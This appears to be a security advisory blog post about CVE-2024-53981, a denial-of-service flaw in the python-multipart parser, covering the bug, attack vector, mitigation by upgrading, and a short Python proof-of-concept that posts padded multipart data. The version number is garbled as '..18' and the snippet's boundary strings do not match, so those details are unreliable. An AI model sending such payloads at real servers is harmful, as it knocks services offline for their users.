A newly discovered vulnerability found in the python-multipart library, identified as CVE-2024-53981, could potentially lead to denial of service (DoS) attacks in ASGI (Asynchronous Server Gateway Interface) applications when left unpatched. This vulnerability has been fixed in the version ..18 of the python-multipart library. In this post, we will discuss the details of this vulnerability, including an overview of python-multipart, how the vulnerability can be exploited, and how to mitigate the risk posed by this issue.

Overview of Python-multipart

Python-multipart is a streaming multipart parser for Python, commonly used for parsing form data in web applications. It efficiently handles large file uploads and can efficiently parse data without loading the entire file into memory. More information about python-multipart can be found in its official repository on GitHub (https://github.com/andrew-d/python-multipart).

Vulnerability Details

When parsing form data, python-multipart skips line breaks (CR \r or LF \n) in front of the first boundary and any tailing bytes after the last boundary. This process takes place one byte at a time and emits a log event each time this occurs. In specific situations, this may cause excessive logging for certain inputs.

Attack Vector

An attacker can exploit this vulnerability in the following manner: They can send a malicious request containing a significant amount of data placed either before the first or after the last boundary. This will then cause high CPU load and effectively stall the processing thread for an extended period of time. In the case of ASGI applications, this will stall the event loop and prevent other requests from being processed, thus resulting in a denial of service (DoS).

Exploit Code Snippet

import requests

url = "http://example.com/upload";
data = b'a' * 100000

headers = {
    "Content-Type": "multipart/form-data; boundary=---1234---"
}
payload = data + b'\r\n-----1234-----\r\nContent-Disposition: form-data; name="file"; filename="test.txt"\r\n\r\nHello, World!\r\n-----1234-----\r\n'

response = requests.post(url, headers=headers, data=payload)

print(response.text)

Mitigation

To mitigate this issue, developers must update their python-multipart library to version ..18 or later. This can be done using pip, the Python package manager, by executing the following command:

pip install --upgrade python-multipart

Conclusion

In summary, the CVE-2024-53981 vulnerability poses a significant risk to ASGI applications, as an attacker can exploit this issue to cause a denial of service attack. To mitigate this risk, it is essential to ensure that your application is using python-multipart version ..18 or later.

Timeline

Published on: 12/02/2024 16:15:14 UTC